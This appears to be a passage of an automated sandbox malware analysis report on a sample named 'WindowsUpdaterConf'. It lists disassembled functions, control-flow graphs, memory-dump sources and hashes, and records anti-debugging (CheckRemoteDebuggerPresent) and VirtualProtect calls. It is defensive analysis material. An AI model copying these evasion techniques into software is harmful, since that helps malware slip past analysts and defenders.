                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 830 60d2e03-60d2e8c CheckRemoteDebuggerPresent 832 60d2e8e-60d2e94 830->832 833 60d2e95-60d2ed0 830->833 832->833
                                                                                          APIs
                                                                                          • CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 060D2E7F
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000001E.00000002.2345661782.00000000060D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_30_2_60d0000_WindowsUpdaterConf.jbxd
                                                                                          Similarity
                                                                                          • API ID: CheckDebuggerPresentRemote
                                                                                          • String ID:
                                                                                          • API String ID: 3662101638-0
                                                                                          • Opcode ID: c22180443571e1183ab9310647750f867c20156bde0761aab1a3cce48eba83e4
                                                                                          • Instruction ID: 89f0cf998ee96a92d81529cb0a9eaaa63f629d23567fe666f7c2f37ff4636116
                                                                                          • Opcode Fuzzy Hash: c22180443571e1183ab9310647750f867c20156bde0761aab1a3cce48eba83e4
                                                                                          • Instruction Fuzzy Hash: B42136B5C012598FCB10CFA9D985BEEFBF4AF58310F18845AE459E7241D3789944CF60
                                                                                          Function 01728970 Relevance: 1.6, APIs: 1, Instructions: 56memoryCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 842 1728970-17289f1 VirtualProtect 845 17289f3-17289f9 842->845 846 17289fa-1728a1f 842->846 845->846
                                                                                          APIs
                                                                                          • VirtualProtect.KERNELBASE(?,?,?,?), ref: 017289E4
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000001E.00000002.2280995766.0000000001720000.00000040.00000800.00020000.00000000.sdmp, Offset: 01720000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_30_2_1720000_WindowsUpdaterConf.jbxd
                                                                                          Similarity
                                                                                          • API ID: ProtectVirtual
                                                                                          • String ID:
                                                                                          • API String ID: 544645111-0
                                                                                          • Opcode ID: 66532cbcca74a4fb4127d1995d682d140b9a6c8c71a48cef0dda9f43b3001021
                                                                                          • Instruction ID: bf51f3f6bdf39fb53ec1af440af234f1bfea56c0d7016ddc7d095413c6c84853
                                                                                          • Opcode Fuzzy Hash: 66532cbcca74a4fb4127d1995d682d140b9a6c8c71a48cef0dda9f43b3001021
                                                                                          • Instruction Fuzzy Hash: 201136B1D002498FDB10DFAAC881ADEFBF4FF98320F14842AD459A7210C775A900CFA1
                                                                                          Function 0619BF50 Relevance: 1.5, Strings: 1, Instructions: 234COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 1077 619bf50-619bf74 1078 619bfdc-619bfe3 1077->1078 1079 619bf76-619bfd4 1077->1079 1080 619bfe5-619c019 1078->1080 1081 619c056-619c067 1078->1081 1079->1078 1088 619c021-619c04a 1080->1088 1082 619c069 1081->1082 1083 619c06e-619c090 1081->1083 1082->1083 1091 619c0ff-619c194 call 6197550 1083->1091 1092 619c092-619c09b 1083->1092 1115 619c1fc-619c222 1088->1115 1116 619c050 1088->1116 1105 619c1b5-619c1bb 1091->1105 1095 619c0aa-619c0b0 1092->1095 1096 619c09d-619c0a2 1092->1096 1100 619c1b0 1095->1100 1101 619c0b6-619c0ba 1095->1101 1096->1095 1100->1105 1101->1091 1103 619c0bc-619c0c5 1101->1103 1107 619c0d4-619c0da 1103->1107 1108 619c0c7-619c0cc 1103->1108 1110 619c1bd 1105->1110 1111 619c1c5 1105->1111 1107->1100 1109 619c0e0-619c0fa 1107->1109 1108->1107 1109->1105 1110->1111 1111->1115 1125 619c229-619c24e 1115->1125 1126 619c224 1115->1126 1116->1081 1127 619c250-619c256 1125->1127 1126->1125 1129 619dfda-619dfde 1127->1129 1130 619c25c 1127->1130 1131 619dfe4-619dfef 1129->1131 1132 619ec87-619eca0 1129->1132 1130->1129 1131->1127 1137 619ec7e-619ec84 1132->1137 1138 619eca2-619eca7 1132->1138 1137->1132
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000001E.00000002.2346497583.0000000006190000.00000040.00000800.00020000.00000000.sdmp, Offset: 06190000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_30_2_6190000_WindowsUpdaterConf.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: Dmq
                                                                                          • API String ID: 0-4031372824
                                                                                          • Opcode ID: b0bf832d9a8596b33098bdfb4fae5644bab52022548f343c8fcdd968e7572fab
                                                                                          • Instruction ID: 15896be7a9487d68449ed30f71ddb7b231f64247a224fec2bb40bd798120f654
                                                                                          • Opcode Fuzzy Hash: b0bf832d9a8596b33098bdfb4fae5644bab52022548f343c8fcdd968e7572fab
                                                                                          • Instruction Fuzzy Hash: 3491EE74A00200CFCB54DF69D494AAABBF2FF8A310F518569D455DB3A5DB35AC82CBE0
                                                                                          Function 01728B40 Relevance: 1.3, APIs: 1, Instructions: 49COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 1166 1728b40-1728baf CloseHandle 1169 1728bb1-1728bb7 1166->1169 1170 1728bb8-1728bdd 1166->1170 1169->1170
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000001E.00000002.2280995766.0000000001720000.00000040.00000800.00020000.00000000.sdmp, Offset: 01720000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_30_2_1720000_WindowsUpdaterConf.jbxd
                                                                                          Similarity
                                                                                          • API ID: CloseHandle
                                                                                          • String ID:
                                                                                          • API String ID: 2962429428-0
                                                                                          • Opcode ID: 1b22ed16174db1d35be3b8093f30f006dc54bfd03b6a3bad221ec55da7e295cb
                                                                                          • Instruction ID: e9c8d0ead87600c91fe1596d51efc36424a4ffca168a6889015a00485472c79b
                                                                                          • Opcode Fuzzy Hash: 1b22ed16174db1d35be3b8093f30f006dc54bfd03b6a3bad221ec55da7e295cb
                                                                                          • Instruction Fuzzy Hash: C71128B19002498FDB20DFAAC44579EFBF5AF88324F248419D519A7340C675A540CB95
                                                                                          Function 0619FC10 Relevance: .2, Instructions: 166COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000001E.00000002.2346497583.0000000006190000.00000040.00000800.00020000.00000000.sdmp, Offset: 06190000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_30_2_6190000_WindowsUpdaterConf.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 2dfe5ab9102689c53404ceaf9deb1cb80da7e36dc5d0d3f96e9d6df420e4518c
                                                                                          • Instruction ID: c6b4371010b37a82888f95166bbaea6c3d0eb1d5644714f95d6094b2a238f9cd
                                                                                          • Opcode Fuzzy Hash: 2dfe5ab9102689c53404ceaf9deb1cb80da7e36dc5d0d3f96e9d6df420e4518c
                                                                                          • Instruction Fuzzy Hash: B85141387141549FDB88EFA6E454A6E3BE7FB88702F108569E905D7394CF389C42CBA1
                                                                                          Function 06197B70 Relevance: .1, Instructions: 84COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000001E.00000002.2346497583.0000000006190000.00000040.00000800.00020000.00000000.sdmp, Offset: 06190000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_30_2_6190000_WindowsUpdaterConf.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 939b1842161fbb441b1c1f1d6e33dfa8149e2fe4de8466eb7655a9a1a46eacfc
                                                                                          • Instruction ID: 0b3693642afa57515bf440c65e9d4bfdcebc186bdecda604e122ff32d0370852
                                                                                          • Opcode Fuzzy Hash: 939b1842161fbb441b1c1f1d6e33dfa8149e2fe4de8466eb7655a9a1a46eacfc
                                                                                          • Instruction Fuzzy Hash: 80319C746142098FDB09EF66E0586AE3BB7FB99701F50442AE54297394CF385D81CFD1
                                                                                          Function 061917FF Relevance: .0, Instructions: 34COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000001E.00000002.2346497583.0000000006190000.00000040.00000800.00020000.00000000.sdmp, Offset: 06190000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_30_2_6190000_WindowsUpdaterConf.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: fe520ab0ea0a3e02a6271bfdfc77394118613ffbd4d2c9ad4af1efa0e93beecc
                                                                                          • Instruction ID: fc3d4ca27920f50dbe3084d2b5e969778a2fdcdb6756fca23df6d19c6bb834d9
                                                                                          • Opcode Fuzzy Hash: fe520ab0ea0a3e02a6271bfdfc77394118613ffbd4d2c9ad4af1efa0e93beecc
                                                                                          • Instruction Fuzzy Hash: 89016D74A002589FDB65DF25CC8479A77B6FF89201F0480E9A409E7315EB396E45CF25
                                                                                          Function 0619FB20 Relevance: .0, Instructions: 29COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000001E.00000002.2346497583.0000000006190000.00000040.00000800.00020000.00000000.sdmp, Offset: 06190000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_30_2_6190000_WindowsUpdaterConf.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 5f4df472d27288d0f4d6ff804847e31431ec42ace34591d365bac4b78aa5ddb3
                                                                                          • Instruction ID: 945ac0125232acb6b767fea048f7f9713edcfeb1fec52b12cd2f38e1bf86b18f
                                                                                          • Opcode Fuzzy Hash: 5f4df472d27288d0f4d6ff804847e31431ec42ace34591d365bac4b78aa5ddb3
                                                                                          • Instruction Fuzzy Hash: 3CF054303242458FEB58AF62E46596A3777FB85B42B808028D403C73A4CF399C41CBE5
                                                                                          Function 06190ACB Relevance: .0, Instructions: 23COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000001E.00000002.2346497583.0000000006190000.00000040.00000800.00020000.00000000.sdmp, Offset: 06190000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_30_2_6190000_WindowsUpdaterConf.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 6b685e94add85e5595e62595689355aeda3e023829f83e9c6edfdab6f92467ec
                                                                                          • Instruction ID: b3055778aa9a3da67bd2f369038566a836d960209f6d21727841c870ba3152cd
                                                                                          • Opcode Fuzzy Hash: 6b685e94add85e5595e62595689355aeda3e023829f83e9c6edfdab6f92467ec
                                                                                          • Instruction Fuzzy Hash: 13F017B4A00218CFEBA59F14D88879977B2FB49202F1041D9E50AE3354DB359E858F61
                                                                                          Function 0619504F Relevance: .0, Instructions: 16COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000001E.00000002.2346497583.0000000006190000.00000040.00000800.00020000.00000000.sdmp, Offset: 06190000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_30_2_6190000_WindowsUpdaterConf.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: e49b7cda8403b50dc37bc5f362cfd4b7c5e14be32fbb8ee3521612188ca9f6e5
                                                                                          • Instruction ID: d83d1b7d0994cd2984c8740f96e1aa525e5e3902f9cbb860b2ba46374abbf204
                                                                                          • Opcode Fuzzy Hash: e49b7cda8403b50dc37bc5f362cfd4b7c5e14be32fbb8ee3521612188ca9f6e5
                                                                                          • Instruction Fuzzy Hash: 12E0E5B4A002189FDBA9DF15D88979DBBB6FB48301F1081DAE509A3354DB342E88CF51
                                                                                          Function 06195043 Relevance: .0, Instructions: 16COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000001E.00000002.2346497583.0000000006190000.00000040.00000800.00020000.00000000.sdmp, Offset: 06190000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_30_2_6190000_WindowsUpdaterConf.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: e49b7cda8403b50dc37bc5f362cfd4b7c5e14be32fbb8ee3521612188ca9f6e5
                                                                                          • Instruction ID: d83d1b7d0994cd2984c8740f96e1aa525e5e3902f9cbb860b2ba46374abbf204
                                                                                          • Opcode Fuzzy Hash: e49b7cda8403b50dc37bc5f362cfd4b7c5e14be32fbb8ee3521612188ca9f6e5
                                                                                          • Instruction Fuzzy Hash: 12E0E5B4A002189FDBA9DF15D88979DBBB6FB48301F1081DAE509A3354DB342E88CF51
                                                                                          Function 06197D28 Relevance: .0, Instructions: 15COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000001E.00000002.2346497583.0000000006190000.00000040.00000800.00020000.00000000.sdmp, Offset: 06190000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_30_2_6190000_WindowsUpdaterConf.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: a4e5256b45cf4a542d569096833954b0603c6cd9ab8acfe81b5d7c63fabe6284
                                                                                          • Instruction ID: 6ef4bc650a817af6a39dfbceff092f416dcda1f9b0f67e27bc0f0cc91a0bdefe
                                                                                          • Opcode Fuzzy Hash: a4e5256b45cf4a542d569096833954b0603c6cd9ab8acfe81b5d7c63fabe6284
                                                                                          • Instruction Fuzzy Hash: E7D0A97180020CEBCB00EFF0D9058AEBBFCEF49210B1008EAD808D3210FE329E10AB91
                                                                                          Function 06195134 Relevance: .0, Instructions: 11COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000001E.00000002.2346497583.0000000006190000.00000040.00000800.00020000.00000000.sdmp, Offset: 06190000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_30_2_6190000_WindowsUpdaterConf.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: e713160bb554b807f2fd70a6cb880a608ab9212b9e72057cd4c41ac1a3d3aac9
                                                                                          • Instruction ID: 3ce33b34d84a88f228299da05cc4c2a329cca7e136740a21c465f6008911d4cb
                                                                                          • Opcode Fuzzy Hash: e713160bb554b807f2fd70a6cb880a608ab9212b9e72057cd4c41ac1a3d3aac9
                                                                                          • Instruction Fuzzy Hash: EFD067B4A401148FDBB49F64E8D869C76B1AB58201F5088AA960AE3294DE304E84CF14
                                                                                          Function 0619BF28 Relevance: .0, Instructions: 10COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000001E.00000002.2346497583.0000000006190000.00000040.00000800.00020000.00000000.sdmp, Offset: 06190000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_30_2_6190000_WindowsUpdaterConf.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 6b890a1878f21bb7f09d862592a755ed2ce311562f5f1a0304c6abbbdd52873e
                                                                                          • Instruction ID: 19d07928bc24b9474f7e59cbdd8b8e0d3deed1c7a519eb3c8c8690cf2c067a2b
                                                                                          • Opcode Fuzzy Hash: 6b890a1878f21bb7f09d862592a755ed2ce311562f5f1a0304c6abbbdd52873e
                                                                                          • Instruction Fuzzy Hash: C5C092303082084B8748D69DE851825F3DA9BCC618328C0BDA80DC7352EE23FC038684
                                                                                          Function 061986F0 Relevance: .0, Instructions: 10COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000001E.00000002.2346497583.0000000006190000.00000040.00000800.00020000.00000000.sdmp, Offset: 06190000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_30_2_6190000_WindowsUpdaterConf.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 6b890a1878f21bb7f09d862592a755ed2ce311562f5f1a0304c6abbbdd52873e
                                                                                          • Instruction ID: 19d07928bc24b9474f7e59cbdd8b8e0d3deed1c7a519eb3c8c8690cf2c067a2b
                                                                                          • Opcode Fuzzy Hash: 6b890a1878f21bb7f09d862592a755ed2ce311562f5f1a0304c6abbbdd52873e
                                                                                          • Instruction Fuzzy Hash: C5C092303082084B8748D69DE851825F3DA9BCC618328C0BDA80DC7352EE23FC038684
                                                                                          Function 06198780 Relevance: .0, Instructions: 9COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000001E.00000002.2346497583.0000000006190000.00000040.00000800.00020000.00000000.sdmp, Offset: 06190000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_30_2_6190000_WindowsUpdaterConf.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 3301139c5a2b1683b3672ad0424fc9e7d6463dcfe631e59b26d81f708267afa4
                                                                                          • Instruction ID: ea54f293b4f0047c39f2f1c04bf85d31d8e6df969897a8ca2267ead1d0af046a
                                                                                          • Opcode Fuzzy Hash: 3301139c5a2b1683b3672ad0424fc9e7d6463dcfe631e59b26d81f708267afa4
                                                                                          • Instruction Fuzzy Hash: 8FC09B3012410C87D7056A55F45949A379FE7D9A05F410027D14507755CE346D41CB95
                                                                                          Function 06198760 Relevance: .0, Instructions: 8COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000001E.00000002.2346497583.0000000006190000.00000040.00000800.00020000.00000000.sdmp, Offset: 06190000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_30_2_6190000_WindowsUpdaterConf.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: b07eb51126463de2bf8462432d69fd4c92e1a2acd6486d465ab4ae050f38ce89
                                                                                          • Instruction ID: 6946c9798f7289baa91495e0fb5539b78174b0423724991b48b9fdfa7c9b4558
                                                                                          • Opcode Fuzzy Hash: b07eb51126463de2bf8462432d69fd4c92e1a2acd6486d465ab4ae050f38ce89
                                                                                          • Instruction Fuzzy Hash: 02B012302081084F8244D6D8E841C14F39DDBC4618354C0ADE80CCB302CF33FC0385C4
                                                                                          Function 06191A64 Relevance: .0, Instructions: 8COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000001E.00000002.2346497583.0000000006190000.00000040.00000800.00020000.00000000.sdmp, Offset: 06190000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_30_2_6190000_WindowsUpdaterConf.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 544bf6b04cfef94d2bca8890dd401db1b0f879e269e8d89c0cdca7c4b4564a41
                                                                                          • Instruction ID: 65b2bfc50afd8767c67b086d9499db9c822f1aa6914a55d61c7276c32de6a31d
                                                                                          • Opcode Fuzzy Hash: 544bf6b04cfef94d2bca8890dd401db1b0f879e269e8d89c0cdca7c4b4564a41
                                                                                          • Instruction Fuzzy Hash: 85C00274A042048FDB745B74A45C2597AA1AB58382F410569A84BC2398DB344A408B55
                                                                                          Function 061976A0 Relevance: .0, Instructions: 8COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000001E.00000002.2346497583.0000000006190000.00000040.00000800.00020000.00000000.sdmp, Offset: 06190000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_30_2_6190000_WindowsUpdaterConf.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 778481114c374013f58dd504163b08aecaedb20851cd843d8b2e6942ade4442f
                                                                                          • Instruction ID: 4a00f5dc1a4745342057266f99d99f8343528934673bb8150e6a530dc89bb7bf
                                                                                          • Opcode Fuzzy Hash: 778481114c374013f58dd504163b08aecaedb20851cd843d8b2e6942ade4442f
                                                                                          • Instruction Fuzzy Hash: 71C09238250208CFC340DB59D589C10BBE8EF49A2835980D8E50D8B733CB32FC01CA80
                                                                                          Function 061987F0 Relevance: .0, Instructions: 7COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000001E.00000002.2346497583.0000000006190000.00000040.00000800.00020000.00000000.sdmp, Offset: 06190000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_30_2_6190000_WindowsUpdaterConf.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 00fb257517fa66d8d82df2fc559de156622b6f4f3f56d113648c417e124a9b6c
                                                                                          • Instruction ID: bde584bcc0a20163e1d20aefd562f14664055d751c7398f878511897cdc0a054
                                                                                          • Opcode Fuzzy Hash: 00fb257517fa66d8d82df2fc559de156622b6f4f3f56d113648c417e124a9b6c
                                                                                          • Instruction Fuzzy Hash: DFB012301042084B8100D6C8D841810F39CDB84518314C099980C47302CA23FC038580
                                                                                          Function 06197310 Relevance: .0, Instructions: 6COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000001E.00000002.2346497583.0000000006190000.00000040.00000800.00020000.00000000.sdmp, Offset: 06190000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_30_2_6190000_WindowsUpdaterConf.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 21aedb4056cfc11893e43cced3a7503cc97dd68ada6ed4eb7e0616f4bfddfba3
                                                                                          • Instruction ID: 39379319d3443947335a5327cbf436aea83b22a576f0cf55a520a10213bd163b
                                                                                          • Opcode Fuzzy Hash: 21aedb4056cfc11893e43cced3a7503cc97dd68ada6ed4eb7e0616f4bfddfba3
                                                                                          • Instruction Fuzzy Hash: F2A02230002B0C8B820032B02000020B38C8880008B8000B8E20C08A2A0833E8A280A8
                                                                                          Function 06197680 Relevance: .0, Instructions: 6COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000001E.00000002.2346497583.0000000006190000.00000040.00000800.00020000.00000000.sdmp, Offset: 06190000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_30_2_6190000_WindowsUpdaterConf.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: f88d47ec4bc22bc9a96384d78819f74bbb1ab2293bf32c4fae4a86830e40a98b
                                                                                          • Instruction ID: 3fd0cda509c72df6e1f3f61c58f00ec3bc5b18155e816547dc3b441fdea480c3
                                                                                          • Opcode Fuzzy Hash: f88d47ec4bc22bc9a96384d78819f74bbb1ab2293bf32c4fae4a86830e40a98b
                                                                                          • Instruction Fuzzy Hash: F8A0243001570CC7C3001770700D410775CD50110534000F5F10C015315F37D010C550
                                                                                          Function 06197A70 Relevance: .0, Instructions: 5COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000001E.00000002.2346497583.0000000006190000.00000040.00000800.00020000.00000000.sdmp, Offset: 06190000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_30_2_6190000_WindowsUpdaterConf.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 1a42ddd8517821e1e6acf9c746250a046ae06500ff8f9ecdb143126497c05388
                                                                                          • Instruction ID: 84eeee319c6123e6c6608c8061c335b8e038e47c740db5980a43c0ae387d7bd4
                                                                                          • Opcode Fuzzy Hash: 1a42ddd8517821e1e6acf9c746250a046ae06500ff8f9ecdb143126497c05388
                                                                                          • Instruction Fuzzy Hash: BE90027104460C8B465027D9744966A775CA655519BC40051E50D515166A5964204695
                                                                                          Function 06191A17 Relevance: .0, Instructions: 4COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000001E.00000002.2346497583.0000000006190000.00000040.00000800.00020000.00000000.sdmp, Offset: 06190000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_30_2_6190000_WindowsUpdaterConf.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 3104941c67fb24c02a12c090a6bbcd969e11bfc23f9753416ba4019cae5871f4
                                                                                          • Instruction ID: dce40d28d2828af5a9be89eb9d9413c6cbba6456359faceb7f68c557d4e3a9bd
                                                                                          • Opcode Fuzzy Hash: 3104941c67fb24c02a12c090a6bbcd969e11bfc23f9753416ba4019cae5871f4
                                                                                          • Instruction Fuzzy Hash: 35B012301001148FD7548E00CD4826532219744302F0002545006D11548B300C408B10

                                                                                          Execution Graph

                                                                                          Execution Coverage:8.7%
                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                          Signature Coverage:0%
                                                                                          Total number of Nodes:24
                                                                                          Total number of Limit Nodes:0
                                                                                          execution_graph 4992 1940850 4993 1940859 4992->4993 4996 1943be2 4992->4996 4999 19434bd 4992->4999 5002 19488c0 4996->5002 5001 19488c0 VirtualProtect 4999->5001 5000 19434d6 5001->5000 5004 19488d3 5002->5004 5006 1948970 5004->5006 5007 19489b8 VirtualProtect 5006->5007 5009 1943bf8 5007->5009 5024 1948b40 5025 1948b80 CloseHandle 5024->5025 5027 1948bb1 5025->5027 5010 2392c50 5011 2392c6e 5010->5011 5014 2392dd0 5011->5014 5018 2392e08 5014->5018 5021 2392e00 5014->5021 5015 2392cbb 5019 2392e4c CheckRemoteDebuggerPresent 5018->5019 5020 2392e8e 5019->5020 5020->5015 5022 2392e4c CheckRemoteDebuggerPresent 5021->5022 5023 2392e8e 5022->5023 5023->5015

                                                                                          Executed Functions

                                                                                          Function 06568C18 Relevance: 11.3, Strings: 7, Instructions: 2546COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 0 6568c18-6568c83 call 6560040 call 656bf28 6 6568c89-656bec4 0->6
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000021.00000002.2409321653.0000000006560000.00000040.00000800.00020000.00000000.sdmp, Offset: 06560000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_33_2_6560000_WindowsUpdaterConf.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: %1K$(K1$9Gxv$9Gxv$=<R3${u(F$C\
                                                                                          • API String ID: 0-857792947
                                                                                          • Opcode ID: d391be44f1a335f86aaafc68974aeaa7e76fd9cca6bc73bb27dbfc5ca8ad0879
                                                                                          • Instruction ID: de5929e218293c231bf089d0ae93e0120dcd71468cb027078f621c14383e1621
                                                                                          • Opcode Fuzzy Hash: d391be44f1a335f86aaafc68974aeaa7e76fd9cca6bc73bb27dbfc5ca8ad0879
                                                                                          • Instruction Fuzzy Hash: 7C534C78A012198FCB94DF28C99469EB7B6FB88705F5085A9D84DE7344EB349F85CF80
                                                                                          Function 06564DC3 Relevance: 3.9, Strings: 3, Instructions: 140COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 522 6564dc3 523 6564dc7-6564dc9 522->523 524 6564dca-6564dcd 523->524 525 6564dce-6564dd3 524->525 526 6564e59-6564e67 524->526 525->526 527 6564e16-6564e29 525->527 528 656501e-6565020 525->528 529 6564f7f-6564f8d 525->529 530 6564e3c-6564e4d 525->530 531 6564f9d-6564fcb 525->531 532 6564dda-6564e14 525->532 533 6564fdb-6564fee 525->533 534 6564e79-6564ea6 525->534 535 6565040 525->535 536 6564e2e-6564e3a 525->536 537 656502c-656503e 525->537 538 6564eea 525->538 539 6564eab-6564ee5 525->539 526->529 552 6564e6d-6564e74 526->552 540 6564ff0-6565002 527->540 528->535 541 6565022-656502a 528->541 529->534 553 6564f93-6564f98 529->553 530->536 556 6564e4f-6564e54 530->556 531->538 564 6564fd1-6564fd6 531->564 532->524 533->540 534->524 536->524 545 656500c-6565015 537->545 551 6564ef6-6564f7a 538->551 539->524 540->545 541->545 545->537 555 6565017 545->555 551->524 552->523 553->524 555->528 555->535 555->537 556->524 564->524
                                                                                          Strings
                                                                                          Memory Dump Source
